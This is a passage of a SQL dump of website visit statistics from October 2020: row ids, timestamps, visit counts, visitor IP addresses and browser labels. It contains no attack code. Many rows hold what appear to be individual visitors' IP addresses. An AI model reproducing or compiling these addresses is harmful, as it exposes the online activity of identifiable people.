1.13.127.24','other'),(543107,1603239100,1,1,0,0,'173.252.127.25','other'),(543108,1603239141,1,1,0,0,'31.13.103.118','other'),(543109,1603240415,1,1,0,0,'69.171.251.10','other'),(543110,1603240427,1,1,0,0,'173.252.95.117','other'),(543111,1603243059,1,1,0,0,'31.13.103.19','other'),(543112,1603246108,1,1,0,0,'173.252.95.111','other'),(543113,1603246815,1,1,0,0,'209.17.97.66','other'),(543114,1603247061,1,1,0,0,'94.153.64.185','chrome'),(543115,1603249378,1,1,0,0,'91.196.178.73','chrome'),(543116,1603250057,1,1,0,0,'173.252.95.6','other'),(543117,1603251964,1,1,0,0,'173.252.95.18','other'),(543118,1603255422,1,1,0,0,'31.13.127.113','other'),(543119,1603255678,1,1,0,0,'31.13.115.5','other'),(543120,1603255798,1,1,0,0,'173.252.95.30','other'),(543121,1603258068,1,1,0,0,'37.52.55.164','chrome'),(543122,1603258405,1,1,0,0,'37.73.82.69','chrome'),(543123,1603259138,1,1,0,0,'173.252.95.26','other'),(543124,1603260593,1,1,0,0,'66.220.149.24','other'),(543125,1603261565,1,1,0,0,'173.252.79.18','other'),(543126,1603261566,1,1,0,0,'173.252.79.111','other'),(543127,1603261567,1,1,0,0,'173.252.83.113','other'),(543128,1603262639,1,1,0,0,'91.196.178.29','chrome'),(543129,1603262652,1,1,0,0,'77.120.15.73','chrome'),(543130,1603262732,1,1,0,0,'31.13.127.13','other'),(543131,1603263040,1,1,0,0,'173.252.95.21','other'),(543132,1603263357,1,1,0,0,'69.171.251.25','other'),(543133,1603264038,1,1,0,0,'31.13.127.11','other'),(543134,1603264045,1,1,0,0,'173.252.95.112','other'),(543135,1603264119,1,1,0,0,'91.196.178.20','chrome'),(543136,1603264912,1,1,0,0,'91.196.178.8','chrome'),(543137,1603265725,1,1,0,0,'69.171.251.22','other'),(543138,1603265990,1,1,0,0,'94.153.81.188','chrome'),(543139,1603266017,1,1,0,0,'66.220.149.1','other'),(543140,1603266181,1,1,0,0,'173.252.127.118','other'),(543141,1603267323,1,1,0,0,'173.252.95.3','other'),(543142,1603268111,1,1,0,0,'176.37.148.186','chrome'),(543143,1603268504,1,1,0,0,'173.252.95.1','other'),(543144,1603269717,1,1,0,0,'31.13.127.5','other'),(543145,1603269988,2,2,0,0,'46.211.0.9','chrome'),(543146,1603270240,1,1,0,0,'173.252.111.16','other'),(543147,1603270973,1,1,0,0,'178.255.168.232','chrome'),(543148,1603272547,1,1,0,0,'173.252.83.23','other'),(543149,1603272548,1,1,0,0,'173.252.83.4','other'),(543150,1603272873,1,1,0,0,'173.252.127.13','other'),(543151,1603273019,1,1,0,0,'173.252.95.20','other'),(543152,1603276453,1,1,0,0,'31.13.127.17','other'),(543153,1603277001,1,1,0,0,'91.196.178.25','chrome'),(543154,1603277907,1,1,0,0,'66.220.149.7','other'),(543156,1603280025,2,2,0,0,'35.239.77.228','firefox'),(543157,1603280027,1,1,0,0,'35.239.77.228','chrome'),(543158,1603280028,2,2,0,0,'35.239.77.228','other'),(543159,1603283063,1,1,0,0,'35.239.77.228','firefox'),(543160,1603283396,1,1,0,0,'31.13.127.8','other'),(543161,1603283815,1,1,0,0,'91.196.177.178','chrome'),(543162,1603285753,1,1,0,0,'31.13.127.12','other'),(543163,1603290656,1,1,0,0,'91.196.178.26','other'),(543164,1603291553,1,1,0,0,'69.171.251.117','other'),(543165,1603291591,1,1,0,0,'91.196.178.26','other'),(543166,1603292382,1,1,0,0,'66.220.149.117','other'),(543167,1603293926,2,2,0,0,'35.239.77.228','firefox'),(543168,1603295444,1,1,0,0,'91.196.178.25','chrome'),(543169,1603295494,1,1,0,0,'31.13.127.116','other'),(543170,1603295495,1,1,0,0,'31.13.127.24','other'),(543171,1603295496,1,1,0,0,'31.13.127.6','other'),(543172,1603295500,1,1,0,0,'31.13.127.120','other'),(543173,1603295502,1,1,0,0,'31.13.127.19','other'),(543174,1603295503,1,1,0,0,'31.13.127.20','other'),(543175,1603295542,1,1,0,0,'91.207.245.154','chrome'),(543176,1603295772,1,1,0,0,'69.171.249.15','other'),(543177,1603296042,1,1,0,0,'5.199.232.39','chrome'),(543178,1603296846,1,1,0,0,'66.220.149.24','other'),(543179,1603297097,1,1,0,0,'91.196.178.170','chrome'),(543180,1603297156,1,1,0,0,'173.252.95.28','other'),(543181,1603297249,1,1,0,0,'185.53.79.220','chrome'),(543182,1603297710,1,1,0,0,'128.124.121.34','chrome'),(543183,1603297755,1,1,0,0,'173.252.95.22','other'),(543184,1603298006,1,1,0,0,'31.13.127.11','other'),(543185,1603298695,1,1,0,0,'5.173.168.255','chrome'),(543186,1603298724,1,1,0,0,'46.211.8.26','chrome'),(543187,1603299020,1,1,0,0,'46.211.4.30','chrome'),(543188,1603299054,1,1,0,0,'109.248.52.214','chrome'),(543189,1603299155,1,1,0,0,'176.121.8.215','chrome'),(543190,1603299701,1,1,0,0,'91.196.178.161','chrome'),(543191,1603299729,1,1,0,0,'185.177.215.4','chrome'),(543192,1603299921,1,1,0,0,'66.220.149.33','other'),(543193,1603299973,1,1,0,0,'31.13.127.11','other'),(543194,1603300678,1,1,0,0,'130.180.211.78','chrome'),(543195,1603301117,1,1,0,0,'91.196.178.66','chrome'),(543196,1603301361,1,1,0,0,'173.252.127.17','other'),(543197,1603302225,1,1,0,0,'66.220.149.25','other'),(543198,1603303056,1,1,0,0,'185.237.217.8','chrome'),(543199,1603303427,1,1,0,0,'94.153.10.120','chrome'),(543200,1603303465,1,1,0,0,'31.13.127.4','other'),(543202,1603303466,2,2,0,0,'31.13.127.116','other'),(543204,1603303467,1,1,0,0,'31.13.127.24','other'),(543205,1603303584,1,1,0,0,'69.171.251.12','other'),(543206,1603303626,1,1,0,0,'31.13.127.7','other'),(543207,1603303759,1,1,0,0,'109.229.29.118','chrome'),(543208,1603303808,1,1,0,0,'91.196.178.175','chrome'),(543209,1603304009,1,1,0,0,'66.220.149.34','other'),(543210,1603304115,1,1,0,0,'37.73.216.135','chrome'),(543211,1603304292,1,1,0,0,'195.10.210.210','chrome'),(543212,1603304948,1,1,0,0,'91.196.178.175','chrome'),(543213,1603304967,1,1,0,0,'66.220.149.5','other'),(543214,1603305277,1,1,0,0,'66.220.149.7','other'),(543215,1603305981,1,1,0,0,'194.44.50.69','chrome'),(543216,1603306552,1,1,0,0,'173.252.111.4','other'),(543217,1603307048,1,1,0,0,'173.252.95.5','other'),(543218,1603307190,1,1,0,0,'178.93.148.52','chrome'),(543219,1603307335,1,1,0,0,'69.171.251.27','other'),(543220,1603308427,1,1,0,0,'66.220.149.20','other'),(543221,1603309335,1,1,0,0,'69.171.251.12','other'),(543222,1603309866,1,1,0,0,'173.252.95.3','other'),(543223,1603310266,1,1,0,0,'173.252.95.27','other'),(543224,1603311062,1,1,0,0,'91.196.178.155','chrome'),(543225,1603311165,1,1,0,0,'130.180.210.74','chrome'),(543226,1603311323,1,1,0,0,'173.252.95.31','other'),(543227,1603311395,1,1,0,0,'31.13.127.16','other'),(543228,1603311715,1,1,0,0,'46.211.17.106','chrome'),(543229,1603312183,1,1,0,0,'188.163.114.129','chrome'),(543230,1603312429,1,1,0,0,'176.121.4.12','chrome'),(543231,1603313708,1,1,0,0,'86.49.230.212','chrome'),(543232,1603314321,1,1,0,0,'37.73.162.188','chrome'),(543233,1603314462,1,1,0,0,'31.13.127.7','other'),(543234,1603314649,1,1,0,0,'94.231.183.51','chrome'),(543235,1603314748,1,1,0,0,'173.252.87.11','other'),(543236,1603314749,1,1,0,0,'173.252.87.120','other'),(543237,1603314767,1,1,0,0,'35.239.77.228','firefox'),(543238,1603315573,1,1,0,0,'194.44.144.102','chrome'),(543239,1603316721,1,0,1,0,'66.249.66.92',''),(543240,1603317013,1,1,0,0,'31.13.127.13','other'),(543241,1603317680,1,1,0,0,'31.13.127.6','other'),(543243,1603317681,1,1,0,0,'31.13.127.119','other'),(543248,1603318018,1,1,0,0,'31.13.127.113','other'),(543249,1603318777,1,1,0,0,'31.13.127.16','other'),(543250,1603318778,1,1,0,0,'31.13.127.13','other'),(543251,1603323147,1,1,0,0,'194.44.135.165','chrome'),(543252,1603337256,1,1,0,0,'31.13.103.3','other'),(543253,1603339219,1,1,0,0,'66.220.149.5','other'),(543254,1603339220,1,1,0,0,'69.171.251.13','other'),(543256,1603339555,1,1,0,0,'69.171.251.25','other'),(543257,1603341907,1,1,0,0,'173.252.127.23','other'),(543258,1603349183,1,1,0,0,'185.177.190.225','chrome'),(543259,1603349388,1,1,0,0,'173.252.87.9','other'),(543260,1603349389,1,1,0,0,'173.252.87.4','other'),(543261,1603349432,1,1,0,0,'91.196.178.114','chrome'),(543262,1603349448,1,1,0,0,'31.13.103.4','other'),(543264,1603349449,2,2,0,0,'31.13.103.17','other'),(543267,1603349952,1,1,0,0,'31.13.115.15','other'),(543268,1603352270,1,1,0,0,'134.122.32.54','chrome'),(543269,1603352272,1,1,0,0,'142.93.158.49','chrome'),(543270,1603352273,1,1,0,0,'178.128.237.138','chrome'),(543271,1603352275,1,1,0,0,'68.183.196.60','chrome'),(543272,1603356808,1,1,0,0,'66.220.149.37','other'),(543273,1603357032,1,1,0,0,'66.220.149.31','other'),(543275,1603357171,1,1,0,0,'31.13.103.16','other'),(543276,1603357216,1,1,0,0,'66.220.149.13','other'),(543277,1603358597,1,1,0,0,'31.148.135.245','chrome'),(543278,1603359432,1,1,0,0,'91.196.178.25','chrome'),(543279,1603360052,1,1,0,0,'173.252.95.24','other'),(543280,1603361914,1,1,0,0,'46.211.51.160','chrome'),(543281,1603362237,1,1,0,0,'91.196.178.124','chrome'),(543282,1603363226,1,1,0,0,'66.220.149.30','other'),(543283,1603364149,1,1,0,0,'91.196.178.25','chrome'),(543284,1603364317,1,1,0,0,'5.172.235.203','chrome'),(543285,1603366126,1,1,0,0,'46.211.24.218','chrome'),(543286,1603367053,1,1,0,0,'91.196.178.59','chrome'),(543287,1603367128,2,2,0,0,'31.13.127.3','other'),(543288,1603367129,1,1,0,0,'31.13.127.119','other'),(543293,1603367275,1,1,0,0,'91.196.178.25','chrome'),(543294,1603368582,1,1,0,0,'199.244.88.132','chrome'),(543295,1603369084,1,1,0,0,'91.196.178.25','chrome'),(543296,1603369119,1,1,0,0,'31.13.103.118','other'),(543297,1603371353,1,1,0,0,'91.196.178.84','chrome'),(543298,1603371568,1,1,0,0,'173.252.95.21','other'),(543299,1603372805,1,1,0,0,'173.252.95.17','other'),(543300,1603372806,1,1,0,0,'31.13.127.6','other'),(543301,1603373630,1,1,0,0,'31.13.127.3','other'),(543302,1603374511,1,1,0,0,'128.124.88.225','chrome'),(543303,1603375167,1,1,0,0,'173.252.95.13','other'),(543304,1603375375,1,1,0,0,'66.220.149.17','other'),(543305,1603375376,1,1,0,0,'173.252.95.10','other'),(543307,1603376680,1,1,0,0,'94.153.12.57','chrome'),(543308,1603377295,1,1,0,0,'66.220.149.117','other'),(543309,1603378189,1,1,0,0,'69.171.251.113','other'),(543310,1603378821,1,1,0,0,'31.13.127.4','other'),(543311,1603380560,1,1,0,0,'173.252.127.17','other'),(543312,1603383212,1,1,0,0,'31.13.127.1','other'),(543313,1603383214,1,1,0,0,'31.13.127.117','other'),(543314,1603383227,1,1,0,0,'31.13.127.23','other'),(543315,1603385908,1,1,0,0,'173.252.79.22','other'),(543316,1603386454,1,1,0,0,'86.111.64.124','chrome'),(543317,1603389145,1,1,0,0,'31.13.127.22','other'),(543318,1603389487,1,1,0,0,'173.252.83.10','other'),(543319,1603389488,1,1,0,0,'173.252.83.7','other'),(543320,1603389616,1,1,0,0,'173.252.111.113','other'),(543321,1603390058,1,1,0,0,'91.196.178.25','chrome'),(543322,1603390265,1,1,0,0,'37.73.162.188','chrome'),(543323,1603390913,1,1,0,0,'188.146.173.83','chrome'),(543324,1603392603,1,1,0,0,'173.252.95.8','other'),(543325,1603393137,1,1,0,0,'31.13.127.6','other'),(543326,1603393998,1,1,0,0,'95.132.132.56','chrome'),(543327,1603395695,1,1,0,0,'82.145.210.152','other'),(543328,1603395922,1,1,0,0,'91.196.178.25','chrome'),(543329,1603396082,2,2,0,0,'88.155.76.7','chrome'),(543330,1603396662,1,1,0,0,'31.13.127.9','other'),(543331,1603397338,1,1,0,0,'37.55.151.27','chrome'),(543332,1603397849,1,1,0,0,'173.252.83.21','other'),(543333,1603399712,1,1,0,0,'91.196.178.25','chrome'),(543334,1603399714,1,1,0,0,'66.220.149.11','other'),(543335,1603402464,1,1,0,0,'173.252.87.18','other'),(543336,1603404191,1,0,1,0,'66.249.66.92',''),(543337,1603405273,1,1,0,0,'91.196.178.133','chrome'),(543338,1603414590,1,1,0,0,'31.13.103.113','other'),(543339,1603415757,1,1,0,0,'176.120.97.21','chrome'),(543340,1603423091,1,1,0,0,'146.0.82.36','other'),(543341,1603425616,1,1,0,0,'46.211.65.69','chrome'),(543342,1603427223,1,1,0,0,'91.196.177.219','other'),(543343,1603434933,1,1,0,0,'92.112.230.181','chrome'),(543344,1603437234,1,1,0,0,'173.252.111.5','other'),(543345,1603437309,1,1,0,0,'173.252.127.14','other'),(543346,1603438607,1,1,0,0,'94.244.165.178','chrome'),(543347,1603439115,1,1,0,0,'31.13.127.23','other'),(543348,1603439485,1,1,0,0,'91.196.178.92','chrome'),(543349,1603442500,1,1,0,0,'91.196.178.132','chrome'),(543350,1603446588,1,1,0,0,'66.220.149.27','other'),(543351,1603448309,1,1,0,0,'209.17.97.66','other'),(543352,1603450418,1,1,0,0,'31.13.127.111','other'),(543353,1603460013,1,1,0,0,'31.13.127.120','other'),(543354,1603460014,1,1,0,0,'31.13.127.20','other'),(543357,1603460015,2,2,0,0,'31.13.127.23','other'),(543359,1603460025,1,1,0,0,'91.196.178.19','chrome'),(543360,1603460489,1,1,0,0,'91.196.178.25','chrome'),(543361,1603462699,1,1,0,0,'46.211.48.96','chrome'),(543362,1603468990,1,1,0,0,'91.196.178.172','other'),(543363,1603470067,1,1,0,0,'31.13.127.7','other'),(543364,1603470080,2,2,0,0,'31.13.127.22','other'),(543365,1603470107,1,1,0,0,'194.246.121.170','other'),(543366,1603471406,1,1,0,0,'91.196.178.25','chrome'),(543367,1603474525,1,1,0,0,'178.251.106.151','chrome'),(543368,1603475359,1,1,0,0,'91.196.178.25','chrome'),(543369,1603476310,1,1,0,0,'173.252.127.9','other'),(543370,1603476797,1,1,0,0,'173.252.111.116','other'),(543371,1603476811,1,1,0,0,'31.13.127.18','other'),(543372,1603477803,1,1,0,0,'66.220.149.1','other'),(543373,1603477930,3,3,0,0,'173.252.111.6','other'),(543375,1603477931,2,2,0,0,'173.252.111.118','other'),(543379,1603477939,1,1,0,0,'173.252.111.5','other'),(543384,1603477940,1,1,0,0,'173.252.111.13','other'),(543385,1603477969,1,1,0,0,'69.171.251.113','other'),(543386,1603478135,1,1,0,0,'173.252.95.112','other'),(543387,1603478171,3,3,0,0,'173.252.111.7','other'),(543388,1603478172,2,2,0,0,'173.252.111.12','other'),(543391,1603478351,1,1,0,0,'173.252.111.1','other'),(543392,1603478352,1,1,0,0,'173.252.111.18','other'),(543394,1603478377,1,1,0,0,'173.252.111.17','other'),(543395,1603479986,1,1,0,0,'69.171.251.21','other'),(543396,1603480756,1,1,0,0,'91.196.178.10','other'),(543397,1603481615,1,1,0,0,'69.171.251.28','other'),(543398,1603482688,1,1,0,0,'69.171.251.20','other'),(543399,1603483427,1,1,0,0,'173.252.87.120','other'),(543400,1603484178,1,1,0,0,'31.13.127.12','other'),(543401,1603484562,1,1,0,0,'173.252.95.3','other'),(543402,1603484628,2,2,0,0,'94.153.33.80','chrome'),(543403,1603485361,3,3,0,0,'31.13.115.15','other'),(543404,1603485362,2,2,0,0,'31.13.115.22','other'),(543405,1603485363,1,1,0,0,'31.13.115.118','other'),(543407,1603485372,1,1,0,0,'66.220.149.37','other'),(543409,1603485854,1,1,0,0,'173.252.95.3','other'),(543410,1603485949,1,1,0,0,'31.13.115.113','other'),(543412,1603485950,1,1,0,0,'31.13.115.16','other'),(543416,1603486365,1,1,0,0,'66.220.149.117','other'),(543417,1603487326,1,1,0,0,'69.171.251.29','other'),(543418,1603491866,1,0,1,0,'66.249.66.91',''),(543419,1603498364,1,1,0,0,'31.13.127.4','other'),(543420,1603517055,2,2,0,0,'91.196.178.25','chrome'),(543421,1603518975,1,1,0,0,'69.171.251.116','other'),(543422,1603520403,1,1,0,0,'31.13.127.3','other'),(543423,1603520818,1,1,0,0,'173.252.127.1','other'),(543424,1603521728,1,1,0,0,'31.13.127.12','other'),(543426,1603521751,1,1,0,0,'31.13.127.10','other'),(543427,1603524371,1,1,0,0,'66.220.149.2','other'),(543428,1603524401,1,1,0,0,'173.252.111.11','other'),(543429,1603525913,1,1,0,0,'173.252.95.6','other'),(543430,1603526757,1,1,0,0,'91.196.178.88','chrome'),(543431,1603530676,1,1,0,0,'31.13.127.4','other'),(543432,1603533669,1,1,0,0,'66.249.92.157','other'),(543433,1603556761,1,1,0,0,'46.45.185.168','chrome'),(543434,1603562180,1,1,0,0,'173.252.111.21','other'),(543435,1603564235,1,1,0,0,'173.252.111.113','other'),(543436,1603566961,1,1,0,0,'46.211.38.211','chrome'),(543437,1603569185,1,1,0,0,'173.252.111.18','other'),(543438,1603570048,1,1,0,0,'173.252.95.8','other'),(543439,1603570145,1,1,0,0,'173.252.127.118','other'),(543440,1603573874,1,1,0,0,'66.220.149.26','other'),(543441,1603574856,1,1,0,0,'66.220.149.7','other'),(543442,1603578288,1,0,1,0,'66.249.66.91',''),(543443,1603580461,1,1,0,0,'31.13.127.8','other'),(543444,1603610144,1,1,0,0,'173.252.95.118','other'),(543445,1603613544,1,1,0,0,'173.252.111.113','other'),(543446,1603616339,1,1,0,0,'37.73.138.22','chrome'),(543447,1603619102,1,1,0,0,'66.220.149.9','other'),(543448,1603636349,1,1,0,0,'66.220.149.13','other'),(543449,1603640689,2,2,0,0,'66.249.66.92','chrome'),(543450,1603641270,1,1,0,0,'66.249.66.91','chrome'),(543451,1603641410,2,2,0,0,'66.249.66.93','chrome'),(543452,1603648054,1,1,0,0,'178.95.70.55','chrome'),(543453,1603650971,1,1,0,0,'173.252.127.9','other'),(543454,1603650972,1,1,0,0,'173.252.127.111','other'),(543455,1603655320,1,1,0,0,'173.252.95.118','other'),(543456,1603656553,1,1,0,0,'31.13.127.23','other'),(543457,1603660004,1,1,0,0,'44.234.35.186','chrome'),(543458,1603660005,1,1,0,0,'91.196.178.21','chrome'),(543459,1603661788,1,1,0,0,'66.220.149.116','other'),(543460,1603662878,1,1,0,0,'66.220.149.10','other'),(543461,1603664696,1,0,1,0,'66.249.66.92',''),(543462,1603678278,4,4,0,0,'109.70.104.23','chrome'),(543463,1603698246,1,1,0,0,'173.252.95.2','other'),(543464,1603699291,1,1,0,0,'173.252.111.10','other'),(543465,1603699404,1,1,0,0,'31.13.127.12','other'),(543466,1603710742,1,1,0,0,'91.196.178.66','chrome'),(543467,1603712634,1,1,0,0,'31.13.127.3','other'),(543468,1603713547,1,1,0,0,'66.220.149.33','other'),(543469,1603713814,1,1,0,0,'66.220.149.3','other'),(543470,1603717160,1,1,0,0,'91.196.178.66','chrome'),(543471,1603722112,1,1,0,0,'91.196.177.46','firefox'),(543472,1603726648,1,1,0,0,'69.171.251.120','other'),(543473,1603728881,1,1,0,0,'173.252.95.116','other'),(543474,1603732213,1,1,0,0,'66.249.66.93','chrome'),(543475,1603732312,1,1,0,0,'66.249.66.91','chrome'),(543476,1603733354,3,3,0,0,'66.249.66.91','chrome'),(543477,1603733361,1,1,0,0,'66.249.66.92','chrome'),(543478,1603734193,1,1,0,0,'66.249.66.93','chrome'),(543479,1603734428,1,1,0,0,'66.249.66.92','chrome'),(543480,1603735156,1,1,0,0,'66.249.66.93','chrome'),(543481,1603735201,1,1,0,0,'66.249.66.91','chrome'),(543482,1603738071,1,1,0,0,'66.220.149.29','other'),(543483,1603738119,1,1,0,0,'91.196.178.21','chrome'),(543484,1603738120,1,1,0,0,'173.252.111.5','other'),(543485,1603738855,1,1,0,0,'173.252.111.10','other'),(543486,1603738866,1,1,0,0,'31.13.127.8','other'),(543487,1603739628,1,1,0,0,'173.252.111.119','other'),(543488,1603739629,1,1,0,0,'173.252.111.116','other'),(543490,1603750616,1,0,1,0,'66.249.66.93',''),(543491,1603758809,1,1,0,0,'31.13.103.118','other'),(543492,1603759663,1,0,1,0,'66.249.66.91',''),(543493,1603773590,1,1,0,0,'91.196.178.180','chrome'),(543494,1603774616,1,1,0,0,'91.196.178.21','chrome'),(543495,1603782719,1,0,1,0,'66.249.66.93',''),(543496,1603785813,1,1,0,0,'176.118.50.138','chrome'),(543497,1603786451,1,1,0,0,'173.252.95.117','other'),(543498,1603787926,1,1,0,0,'66.220.149.29','other'),(543499,1603792560,1,1,0,0,'31.13.127.13','other'),(543500,1603801471,1,1,0,0,'91.196.178.21','chrome'),(543501,1603801483,1,1,0,0,'173.252.95.19','other'),(543502,1603810901,1,1,0,0,'94.153.68.3','chrome'),(543503,1603812295,1,1,0,0,'91.196.178.90','chrome'),(543504,1603813989,1,0,1,0,'66.249.66.91',''),(543505,1603814547,1,1,0,0,'185.237.217.15','chrome'),(543506,1603817984,1,1,0,0,'91.196.178.90','chrome'),(543507,1603831448,1,1,0,0,'178.92.94.206','chrome'),(543508,1603831988,1,1,0,0,'173.252.95.26','other'),(543509,1603834586,1,1,0,0,'66.249.66.77','chrome'),(543510,1603838686,1,1,0,0,'173.252.95.28','other'),(543511,1603846061,1,0,1,0,'66.249.66.92',''),(543512,1603865574,1,1,0,0,'173.252.95.9','other'),(543513,1603865907,1,1,0,0,'91.196.178.180','chrome'),(543514,1603869752,1,1,0,0,'66.249.93.118','chrome'),(543516,1603874161,1,1,0,0,'173.252.127.6','other'),(543517,1603882046,1,1,0,0,'31.13.127.116','other'),(543518,1603882048,1,1,0,0,'66.220.149.5','other'),(543519,1603884820,1,0,1,0,'66.249.66.93',''),(543520,1603888141,1,1,0,0,'31.13.127.17','other'),(543521,1603888592,1,1,0,0,'209.17.96.162','other'),(543522,1603904770,1,1,0,0,'66.220.149.26','other'),(543523,1603907016,1,1,0,0,'31.13.127.118','other'),(543524,1603909240,1,1,0,0,'173.252.95.28','other'),(543525,1603909331,1,1,0,0,'66.220.149.27','other'),(543526,1603932489,1,0,1,0,'66.249.66.92',''),(543527,1603939459,1,1,0,0,'66.249.66.93','chrome'),(543528,1603940035,1,1,0,0,'173.249.22.173','chrome'),(543529,1603956872,1,1,0,0,'188.191.239.163','chrome'),(543530,1603958880,1,1,0,0,'69.171.251.2','other'),(543531,1603982182,1,1,0,0,'31.13.127.8','other'),(543532,1603984624,2,2,0,0,'176.37.84.6','chrome'),(543533,1603989851,1,1,0,0,'91.196.178.21','chrome'),(543534,1603990178,2,2,0,0,'178.133.145.202','chrome'),(543535,1603990374,1,1,0,0,'31.13.127.111','other'),(543536,1603990471,1,1,0,0,'31.13.127.23','other'),(543537,1603990473,2,2,0,0,'31.13.127.14','other'),(543538,1603990477,2,2,0,0,'31.13.127.11','other'),(543539,1603990478,1,1,0,0,'31.13.127.24','other'),(543540,1603990527,2,2,0,0,'31.13.127.119','other'),(543541,1603990528,2,2,0,0,'31.13.127.20','other'),(543542,1603990532,1,1,0,0,'31.13.127.6','other'),(543543,1603990537,1,1,0,0,'31.13.127.113','other'),(543544,1603990538,1,1,0,0,'31.13.127.16','other'),(543545,1603990539,1,1,0,0,'31.13.127.3','other'),(543547,1603990540,1,1,0,0,'31.13.127.7','other'),(543548,1603990561,1,1,0,0,'91.196.178.114','chrome'),(543549,1603990580,1,1,0,0,'185.237.217.27','chrome'),(543550,1603990590,1,1,0,0,'178.133.12.227','chrome'),(543551,1603990601,1,1,0,0,'128.124.45.168','chrome'),(543552,1603990607,1,1,0,0,'46.211.53.47','chrome'),(543553,1603990619,1,1,0,0,'91.196.178.161','chrome'),(543554,1603990655,1,1,0,0,'46.133.205.239','chrome'),(543555,1603990659,1,1,0,0,'46.211.19.119','chrome'),(543556,1603990664,1,1,0,0,'91.196.178.92','chrome'),(543557,1603990701,1,1,0,0,'91.196.178.181','chrome'),(543558,1603990711,1,1,0,0,'88.155.75.191','chrome'),(543559,1603990718,1,1,0,0,'91.196.178.183','other'),(543560,1603990755,1,1,0,0,'178.95.246.162','chrome'),(543561,1603990757,1,1,0,0,'91.196.178.112','chrome'),(543562,1603990764,1,1,0,0,'91.196.178.25','chrome'),(543563,1603990776,1,1,0,0,'46.211.36.77','chrome'),(543564,1603990780,1,1,0,0,'46.211.38.34','chrome'),(543565,1603990782,1,1,0,0,'95.134.170.200','chrome'),(543566,1603990783,2,2,0,0,'91.196.178.179','chrome'),(543569,1603990803,1,1,0,0,'88.155.123.23','chrome'),(543570,1603990806,1,1,0,0,'91.196.178.21','chrome'),(543571,1603990808,1,1,0,0,'91.196.178.172','chrome'),(543572,1603990818,1,1,0,0,'91.196.178.27','other'),(543573,1603990837,1,1,0,0,'95.135.90.198','chrome'),(543574,1603990863,1,1,0,0,'46.201.135.166','chrome'),(543575,1603990864,1,1,0,0,'88.155.118.190','chrome'),(543576,1603990903,1,1,0,0,'91.196.178.103','chrome'),(543577,1603990941,1,1,0,0,'173.252.95.119','other'),(543578,1603990944,1,1,0,0,'185.237.217.10','chrome'),(543579,1603990948,1,1,0,0,'91.196.178.157','chrome'),(543580,1603990983,1,1,0,0,'88.155.101.254','chrome'),(543581,1603990992,1,1,0,0,'91.196.178.178','chrome'),(543582,1603991051,2,2,0,0,'91.196.178.93','chrome'),(543583,1603991055,1,1,0,0,'95.134.168.45','chrome'),(543584,1603991057,1,1,0,0,'46.211.71.23','chrome'),(543585,1603991070,1,1,0,0,'88.155.86.224','chrome'),(543586,1603991079,1,1,0,0,'94.153.35.157','chrome'),(543587,1603991084,1,1,0,0,'185.237.217.30','other'),(543588,1603991087,1,1,0,0,'185.138.228.227','chrome'),(543589,1603991097,1,1,0,0,'37.73.20.115','chrome'),(543590,1603991098,1,1,0,0,'91.196.178.87','other'),(543593,1603991116,1,1,0,0,'37.73.91.200','chrome'),(543594,1603991118,1,1,0,0,'92.113.127.239','chrome'),(543595,1603991126,1,1,0,0,'91.196.178.164','chrome'),(543596,1603991131,1,1,0,0,'91.196.177.26','chrome'),(543597,1603991160,1,1,0,0,'46.211.15.95','chrome'),(543598,1603991172,2,2,0,0,'91.196.178.47','chrome'),(543599,1603991179,1,1,0,0,'91.196.178.186','chrome'),(543600,1603991214,1,1,0,0,'91.196.178.56','chrome'),(543601,1603991238,1,1,0,0,'91.196.178.71','chrome'),(543602,1603991239,1,1,0,0,'94.153.1.60','chrome'),(543603,1603991255,1,1,0,0,'128.124.216.224','chrome'),(543604,1603991261,1,1,0,0,'66.220.149.34','other'),(543605,1603991277,1,1,0,0,'91.196.178.84','chrome'),(543606,1603991306,1,1,0,0,'91.196.178.48','chrome'),(543607,1603991317,1,1,0,0,'91.196.178.91','chrome'),(543608,1603991357,1,1,0,0,'91.196.178.175','chrome'),(543609,1603991366,1,1,0,0,'37.55.58.148','chrome'),(543610,1603991393,1,1,0,0,'91.196.178.118','chrome'),(543611,1603991397,1,1,0,0,'91.204.95.51','chrome'),(543612,1603991400,1,1,0,0,'92.45.34.178','chrome'),(543613,1603991447,1,1,0,0,'31.13.127.112','other'),(543614,1603991493,1,1,0,0,'91.196.178.61','chrome'),(543615,1603991515,1,1,0,0,'91.196.178.4','chrome'),(543616,1603991520,1,1,0,0,'193.108.51.254','other'),(543617,1603991532,1,1,0,0,'91.196.178.72','chrome'),(543618,1603991557,1,1,0,0,'46.211.45.247','chrome'),(543619,1603991577,1,1,0,0,'88.155.50.255','chrome'),(543620,1603991598,1,1,0,0,'46.133.244.74','chrome'),(543621,1603991667,1,1,0,0,'37.53.110.86','chrome'),(543622,1603991675,1,1,0,0,'46.211.13.58','chrome'),(543623,1603991754,1,1,0,0,'95.132.19.11','chrome'),(543624,1603991763,1,1,0,0,'185.237.217.28','chrome'),(543625,1603991788,1,1,0,0,'91.196.177.219','other'),(543626,1603991796,1,1,0,0,'91.196.178.146','chrome'),(543627,1603991841,1,1,0,0,'94.153.28.100','chrome'),(543628,1603991845,1,1,0,0,'37.73.87.4','other'),(543629,1603991965,2,2,0,0,'91.196.178.180','chrome'),(543630,1603991968,1,1,0,0,'37.54.114.252','chrome'),(543631,1603991999,1,1,0,0,'31.13.127.3','other'),(543632,1603992038,1,1,0,0,'31.41.49.204','chrome'),(543633,1603992054,1,1,0,0,'91.196.178.21','chrome'),(543634,1603992066,1,1,0,0,'91.196.178.167','chrome'),(543635,1603992095,1,1,0,0,'46.211.33.215','chrome'),(543636,1603992158,1,1,0,0,'79.110.132.23','chrome'),(543637,1603992173,1,1,0,0,'91.196.177.137','chrome'),(543638,1603992184,1,1,0,0,'185.237.217.23','chrome'),(543639,1603992247,1,1,0,0,'173.252.83.117','other'),(543640,1603992256,1,1,0,0,'91.196.178.136','other'),(543641,1603992271,1,1,0,0,'91.196.178.173','chrome'),(543642,1603992274,1,1,0,0,'95.132.9.191','chrome'),(543643,1603992275,1,1,0,0,'91.196.178.138','chrome'),(543644,1603992286,1,1,0,0,'92.113.191.53','chrome'),(543645,1603992318,1,1,0,0,'93.73.125.54','chrome'),(543646,1603992364,1,1,0,0,'178.133.1.249','chrome'),(543647,1603992365,1,1,0,0,'5.173.59.220','chrome'),(543648,1603992366,1,1,0,0,'91.196.178.122','chrome'),(543649,1603992367,1,1,0,0,'91.196.178.142','chrome'),(543650,1603992392,1,1,0,0,'91.196.178.108','chrome'),(543651,1603992438,1,1,0,0,'88.155.163.13','chrome'),(543652,1603992441,1,1,0,0,'91.196.178.102','chrome'),(543653,1603992450,1,1,0,0,'46.211.37.27','chrome'),(543654,1603992463,2,2,0,0,'